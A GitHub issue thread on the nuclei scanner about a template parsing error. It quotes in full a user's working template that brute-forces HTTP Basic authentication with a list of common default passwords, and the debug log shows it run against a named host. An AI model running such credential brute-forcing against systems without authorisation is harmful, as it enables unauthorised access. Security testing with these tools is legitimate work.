### ISSUE TITLE
Could not execute step:  No parameter 'username' found.

### ISSUE THREAD

**Issue by aali99** [projectdiscovery/nuclei#512]
**Describe the bug**
i have a custom template to brute force basicauth whish is this one 

requests:

  - payloads:
      username:
        - admin
        - root

      password:
        - admin
        - pass1
        - pass1
        - root
        - welcome
        - p@ssw0rd
        - user
        - test
        - testest
        - dupa8
        - admin123
        - admin1234
        - admin12345
        - anonymous
        - manager
        - linux
        - system

    attack: clusterbomb

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9
        Connection: close

    matchers:
      - type: status
        status:
          - 200

but when i run it on a target with basic authintication it returns me this error on debug mode 

[INF] Using 1 rules (1 templates, 0 workflows)
[http-request] Sent for [basic-auth-bruteforce] to http://blog.qa.styletime.no:80
[WRN] [basic-auth-bruteforce] Could not execute step: No parameter 'username' found.
[0:00:05] | Templates: 1 | Hosts: 1 | RPS: 3 | Errors: 1 | Requests: 18/18 (100%)
[INF] No results found. Happy hacking!

**Nuclei version**
Please share the version of the nuclei you are running with `nuclei -version` 

latest 2.2.0
**Screenshot of the error or bug**
please add the screenshot showing bug or issue yo
![nu](https://user-images.githubusercontent.com/68443067/106411818-d349fc00-644e-11eb-9bc8-12a5dbd6942e.PNG)
u are facing.

**Comment by aali99** [comment]
i tried to use wordlists instead of words and followed templates documentation, but get this error 
![2021-02-01 19_13_51-Window](https://user-images.githubusercontent.com/68443067/106493735-3759d800-64c2-11eb-81fe-cc991cf0c912.png)

**Comment by bauthard** [comment]
@aali99 thank you for creating an issue for this, this is a known issue already fixed in the dev branch.

**Comment by Ice3man543** [comment]
Closing this as fixed in dev branch!
